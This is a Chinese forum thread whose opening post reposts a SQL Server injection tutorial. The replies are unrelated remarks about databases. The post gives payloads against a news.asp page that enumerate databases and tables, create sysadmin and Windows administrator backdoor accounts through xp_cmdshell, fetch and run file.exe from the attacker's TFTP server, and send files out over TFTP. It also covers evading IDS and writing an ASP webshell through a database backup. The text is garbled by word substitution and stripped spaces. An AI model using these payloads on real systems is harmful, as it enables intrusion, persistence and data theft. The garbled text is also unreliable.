仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 2455|回复: 7
打印 上一主题 下一主题

[学习教程] MSSQL教程之桂林老兵的SQLSERVER初级注进技能

[复制链接]
乐观 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:40:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
支持大型的数据库。可以处理拥有上千万条记录的大型数据库。server|sqlserver|初级|技能如今将老兵自己多年的SQLSERVER注进初级技能贡献给撑持老兵的伴侣:


媒介:
便是初级技能,别的基础的注进办法就不胪陈了。
看不懂可查本站的注进基本文章。
为了更好的用好注进,倡议人人看看本站的SQL语法相干文章


[猎取全体数据库名]
selectnamefrommaster.dbo.sysdatabaseswheredbid=7//dbid的值为7以上都是用户数据库


[取得数据表名][将字段值更新为表名,再设法读出这个字段的值便可失掉表名]
selecttop1namefrom数据库名.dbo.sysobjectswherextype=uandstatus>0andnamenotin(table)


[取得数据表字段名][将字段值更新为字段名,再设法读出这个字段的值便可失掉字段名]
selecttop1数据库名.dbo.col_name(object_id(要查询的数据表名),字段列如:1)[where前提]


经由过程SQLSERVER注进毛病建数据库办理员帐号和体系办理员帐号[以后帐号必需是SYSADMIN组]


news.asp?id=2;execmaster.dbo.sp_addlogintest,test;--//增加数据库用户用户test,暗码为test
news.asp?id=2;execmaster.dbo.sp_passwordtest,123456,test;--//假如想改暗码,则用这句(将test的暗码改成123456)
news.asp?id=2;execmaster.dbo.sp_addsrvrolemembertest,sysadmin;--//将test加到sysadmin组,这个组的成员可实行任何操纵
news.asp?id=2;execmaster.dbo.xp_cmdshellnetusertesttest/add;--//增加体系用户test,暗码为test
news.asp?id=2;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorstest/add;--//将体系用户test提拔为办理员


如许,你在他的数据库和体系内都留下了test办理员账号了


上面是怎样从你的服器下载文件file.exe后运转它[条件是你必需将你的电脑设为TFTP服务器,将69端口翻开]


id=2;execmaster.dbo.xp_cmdshelltftp–i你的IPgetfile.exe;--


然后运转这个文件:
id=2;execmaster.dbo.xp_cmdshellfile.exe;--


下载服务器的文件file2.doc到当地TFTP服务器[文件必需存在]:


id=2;execmaster.dbo.xp_cmdshelltftp–i你的IPPutfile2.doc;--


绕过IDS的检测[利用变量]
declare@asysnameset@a=xp_+cmdshellexec@adirc:
declare@asysnameset@a=xp+_cm+dshellexec@adirc:


新加的:


建一个表。只要一个字段,范例为image,将asp内容写进。导出数据库为文件
backupdatabasedbnametodisk=d:webdb.asp;


报错失掉体系操纵体系和数据库体系版本号
id=2and1(select@@VERSION);
导致了一个使用几乎和mSQL一样的API接口的用于他们的数据库的新的SQL接口的产生,这样,这个API被设计成允许为用于mSQL而写的第三方代码更容易移植到MySQL。
不帅 该用户已被删除
沙发
发表于 2015-1-18 05:45:33 来自手机 | 只看该作者
XML字段类型更好的解决了XML数据的操作。XQuery确实不错,但是个人对其没好感。(CSDN的开发者应该是相当的熟了!)
板凳
发表于 2015-1-21 11:42:40 | 只看该作者
一个百万级别的基本信息表A,一个百万级别的详细记录表B,A中有个身份证id,B中也有身份id;先要找出A中在B的详细记录。
深爱那片海 该用户已被删除
地板
发表于 2015-1-30 17:24:30 | 只看该作者
光写几个SQL实在叫无知。
变相怪杰 该用户已被删除
5#
发表于 2015-3-5 05:46:02 | 只看该作者
从项目平台的选择上讲,我们关心的,应该是一款产品能不能满足任务需求,而不是网上怎么说。
小魔女 该用户已被删除
6#
发表于 2015-3-11 23:35:23 | 只看该作者
如果我们从集合论(关系代数)的角度来看,一张数据库的表就是一组数据元的关系,而每个SQL语句会改变一种或数种关系,从而产生出新的数据元的关系(即产生新的表)。
飘飘悠悠 该用户已被删除
7#
发表于 2015-3-19 16:07:11 | 只看该作者
无法深入到数据库系统层面去了解和探究
蒙在股里 该用户已被删除
8#
发表于 2015-3-28 23:37:48 | 只看该作者
我是新手,正在学习数据库和操作系统,深感理论的泛广,唯有一步一步来,但是又感觉时间不够,收集了很多资料却总是没能认真的看完,希望有一个讨论板块,大家共同解决,共同分享,共同努力
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 08:56

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表